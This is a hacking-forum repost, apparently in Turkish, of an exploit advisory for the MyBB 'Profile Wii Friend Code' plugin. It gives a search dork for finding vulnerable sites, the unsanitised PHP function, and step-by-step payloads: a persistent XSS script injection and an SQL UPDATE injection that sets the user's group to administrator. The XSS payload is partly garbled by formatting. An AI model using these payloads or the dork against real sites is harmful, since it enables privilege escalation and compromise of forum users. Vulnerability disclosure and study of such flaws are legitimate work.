İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

MyBB Profile Wii Friend Code - Multiple Vulnerabilities

08-02-2014 17:45
#1
Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.064
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6362
Konular:
969
Kod:
# Exploit Title: MyBB Profile Wii Friend Code SQLi/Persistent XSS
# Dork: intitle:"Profile of" intext:"Wii Friend Code" inurl:member.php
# Date: 1/3/2013
# Exploit Author: Ichi
# Vendor Homepage: http://mods.mybb.com/view/profile-wii-friend-code
# Software Link: http://mods.mybb.com/download/profile-wii-friend-code
# Version: 1.0
# Tested on: Windows 7 64-bit
*
"Profile Wii Friend Code" MyBB plugin is vulnerable to SQL UPDATE Injection and Persistent XSS.
*
The vulnerable code lies here(in profilewfc.php):
*
<?php
function profilewfc_update($wfc)
{
**global $mybb;
*
**if (isset($mybb->input['wfc']))
***{
******$wfc->user_update_data['wfc'] = $mybb->input['wfc'];
***}
}
?>
*
As you can see the input is not sanitized in the least...
*
Persistent XSS:
1. Go to your user cp and edit your profile - usercp.php?action=profile
2. and at the "Wii Friend Code Wii Friend Code" box enter: **********alert(1)</script> and then press submit
3. http://prntscr.com/o1x2p, submit, and http://prntscr.com/o1x69
*
SQL Injection:
1. Go to your user cp and edit your profile - usercp.php?action=profile
2. Enter this into the Wii Friend Code field as you would do with the 1st vulnerability: x', usergroup='4
3. submit and now you belong to whatever usergroup to choice to belong to
*
PoC:
Before: http://prntscr.com/o1xkg
Exploit: http://prntscr.com/o1xnd
Aftermath(now an admin): http://prntscr.com/o1xoj
*
https://twitter.com/TeamDigi7al
~Ichi
Kullanıcı İmzası
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı